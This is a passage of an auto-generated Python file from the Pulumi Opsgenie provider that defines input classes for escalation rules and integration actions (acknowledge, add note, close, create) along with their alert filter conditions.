@pulumi.getter(name="waitInterval")
def wait_interval(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "wait_interval")
@wait_interval.setter
def wait_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "wait_interval", value)
@pulumi.input_type
class EscalationRuleArgs:
def __init__(__self__, *,
condition: pulumi.Input[str],
delay: pulumi.Input[int],
notify_type: pulumi.Input[str],
recipients: pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]):
"""
:param pulumi.Input[str] condition: The condition for notifying the recipient of escalation rule that is based on the alert state. Possible values are: `if-not-acked` and `if-not-closed`. Default: `if-not-acked`
:param pulumi.Input[int] delay: Time delay of the escalation rule, in minutes.
:param pulumi.Input[str] notify_type: Recipient calculation logic for schedules. Possible values are:
:param pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]] recipients: Object of schedule, team, or users which will be notified in escalation. The possible values for participants are: `user`, `schedule`, `team`.
"""
pulumi.set(__self__, "condition", condition)
pulumi.set(__self__, "delay", delay)
pulumi.set(__self__, "notify_type", notify_type)
pulumi.set(__self__, "recipients", recipients)
@property
@pulumi.getter
def condition(self) -> pulumi.Input[str]:
"""
The condition for notifying the recipient of escalation rule that is based on the alert state. Possible values are: `if-not-acked` and `if-not-closed`. Default: `if-not-acked`
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: pulumi.Input[str]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def delay(self) -> pulumi.Input[int]:
"""
Time delay of the escalation rule, in minutes.
"""
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: pulumi.Input[int]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter(name="notifyType")
def notify_type(self) -> pulumi.Input[str]:
"""
Recipient calculation logic for schedules. Possible values are:
"""
return pulumi.get(self, "notify_type")
@notify_type.setter
def notify_type(self, value: pulumi.Input[str]):
pulumi.set(self, "notify_type", value)
@property
@pulumi.getter
def recipients(self) -> pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]:
"""
Object of schedule, team, or users which will be notified in escalation. The possible values for participants are: `user`, `schedule`, `team`.
"""
return pulumi.get(self, "recipients")
@recipients.setter
def recipients(self, value: pulumi.Input[Sequence[pulumi.Input['EscalationRuleRecipientArgs']]]):
pulumi.set(self, "recipients", value)
@pulumi.input_type
class EscalationRuleRecipientArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The ID of the Opsgenie Escalation.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Opsgenie Escalation.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class IncidentTemplateStakeholderPropertyArgs:
def __init__(__self__, *,
message: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
enable: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] message: Message that is to be passed to audience that is generally used to provide a content information about the alert.
:param pulumi.Input[str] description: Description that is generally used to provide a detailed information about the alert. This field must not be longer than 15000 characters.
:param pulumi.Input[bool] enable: Option to enable stakeholder notifications.Default value is true.
"""
pulumi.set(__self__, "message", message)
if description is not None:
pulumi.set(__self__, "description", description)
if enable is not None:
pulumi.set(__self__, "enable", enable)
@property
@pulumi.getter
def message(self) -> pulumi.Input[str]:
"""
Message that is to be passed to audience that is generally used to provide a content information about the alert.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: pulumi.Input[str]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description that is generally used to provide a detailed information about the alert. This field must not be longer than 15000 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
Option to enable stakeholder notifications.Default value is true.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@pulumi.input_type
class IntegrationActionAcknowledgeArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alias: Optional[pulumi.Input[str]] = None,
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]] = None,
note: Optional[pulumi.Input[str]] = None,
order: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[str] alias: An identifier that is used for alert deduplication. Default: `{{alias}}`.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[str] note: Additional alert action note.
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
:param pulumi.Input[str] user: Owner of the execution for integration action.
"""
pulumi.set(__self__, "name", name)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if note is not None:
pulumi.set(__self__, "note", note)
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
An identifier that is used for alert deduplication. Default: `{{alias}}`.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter
def note(self) -> Optional[pulumi.Input[str]]:
"""
Additional alert action note.
"""
return pulumi.get(self, "note")
@note.setter
def note(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "note", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Owner of the execution for integration action.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionAcknowledgeFilterArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAcknowledgeFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionAcknowledgeFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionAddNoteArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alias: Optional[pulumi.Input[str]] = None,
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]] = None,
note: Optional[pulumi.Input[str]] = None,
order: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[str] alias: An identifier that is used for alert deduplication. Default: `{{alias}}`.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[str] note: Additional alert action note.
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
:param pulumi.Input[str] user: Owner of the execution for integration action.
"""
pulumi.set(__self__, "name", name)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if note is not None:
pulumi.set(__self__, "note", note)
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
An identifier that is used for alert deduplication. Default: `{{alias}}`.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter
def note(self) -> Optional[pulumi.Input[str]]:
"""
Additional alert action note.
"""
return pulumi.get(self, "note")
@note.setter
def note(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "note", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Owner of the execution for integration action.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionAddNoteFilterArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionAddNoteFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionAddNoteFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCloseArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alias: Optional[pulumi.Input[str]] = None,
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]] = None,
note: Optional[pulumi.Input[str]] = None,
order: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[str] alias: An identifier that is used for alert deduplication. Default: `{{alias}}`.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[str] note: Additional alert action note.
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
:param pulumi.Input[str] user: Owner of the execution for integration action.
"""
pulumi.set(__self__, "name", name)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if note is not None:
pulumi.set(__self__, "note", note)
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
An identifier that is used for alert deduplication. Default: `{{alias}}`.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter
def note(self) -> Optional[pulumi.Input[str]]:
"""
Additional alert action note.
"""
return pulumi.get(self, "note")
@note.setter
def note(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "note", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Owner of the execution for integration action.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionCloseFilterArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCloseFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionCloseFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCreateArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alert_actions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
alias: Optional[pulumi.Input[str]] = None,
append_attachments: Optional[pulumi.Input[bool]] = None,
custom_priority: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
entity: Optional[pulumi.Input[str]] = None,
extra_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]] = None,
ignore_alert_actions_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_extra_properties_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_responders_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_tags_from_payload: Optional[pulumi.Input[bool]] = None,
ignore_teams_from_payload: Optional[pulumi.Input[bool]] = None,
message: Optional[pulumi.Input[str]] = None,
note: Optional[pulumi.Input[str]] = None,
order: Optional[pulumi.Input[int]] = None,
priority: Optional[pulumi.Input[str]] = None,
responders: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]] = None,
source: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[str] alias: An identifier that is used for alert deduplication. Default: `{{alias}}`.
:param pulumi.Input[str] custom_priority: Custom alert priority. e.g. ``{{message.substring(0,2)}}``
:param pulumi.Input[str] description: Detailed description of the alert, anything that may not have fit in the `message` field.
:param pulumi.Input[str] entity: The entity the alert is related to.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] extra_properties: Set of user defined properties specified as a map.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[bool] ignore_responders_from_payload: If enabled, the integration will ignore responders sent in request payloads.
:param pulumi.Input[bool] ignore_teams_from_payload: If enabled, the integration will ignore teams sent in request payloads.
:param pulumi.Input[str] message: Alert text limited to 130 characters.
:param pulumi.Input[str] note: Additional alert action note.
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] priority: Alert priority.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]] responders: User, schedule, teams or escalation names to calculate which users will receive notifications of the alert.
:param pulumi.Input[str] source: User defined field to specify source of action.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Comma separated list of labels to be attached to the alert.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
:param pulumi.Input[str] user: Owner of the execution for integration action.
"""
pulumi.set(__self__, "name", name)
if alert_actions is not None:
pulumi.set(__self__, "alert_actions", alert_actions)
if alias is not None:
pulumi.set(__self__, "alias", alias)
if append_attachments is not None:
pulumi.set(__self__, "append_attachments", append_attachments)
if custom_priority is not None:
pulumi.set(__self__, "custom_priority", custom_priority)
if description is not None:
pulumi.set(__self__, "description", description)
if entity is not None:
pulumi.set(__self__, "entity", entity)
if extra_properties is not None:
pulumi.set(__self__, "extra_properties", extra_properties)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if ignore_alert_actions_from_payload is not None:
pulumi.set(__self__, "ignore_alert_actions_from_payload", ignore_alert_actions_from_payload)
if ignore_extra_properties_from_payload is not None:
pulumi.set(__self__, "ignore_extra_properties_from_payload", ignore_extra_properties_from_payload)
if ignore_responders_from_payload is not None:
pulumi.set(__self__, "ignore_responders_from_payload", ignore_responders_from_payload)
if ignore_tags_from_payload is not None:
pulumi.set(__self__, "ignore_tags_from_payload", ignore_tags_from_payload)
if ignore_teams_from_payload is not None:
pulumi.set(__self__, "ignore_teams_from_payload", ignore_teams_from_payload)
if message is not None:
pulumi.set(__self__, "message", message)
if note is not None:
pulumi.set(__self__, "note", note)
if order is not None:
pulumi.set(__self__, "order", order)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if responders is not None:
pulumi.set(__self__, "responders", responders)
if source is not None:
pulumi.set(__self__, "source", source)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
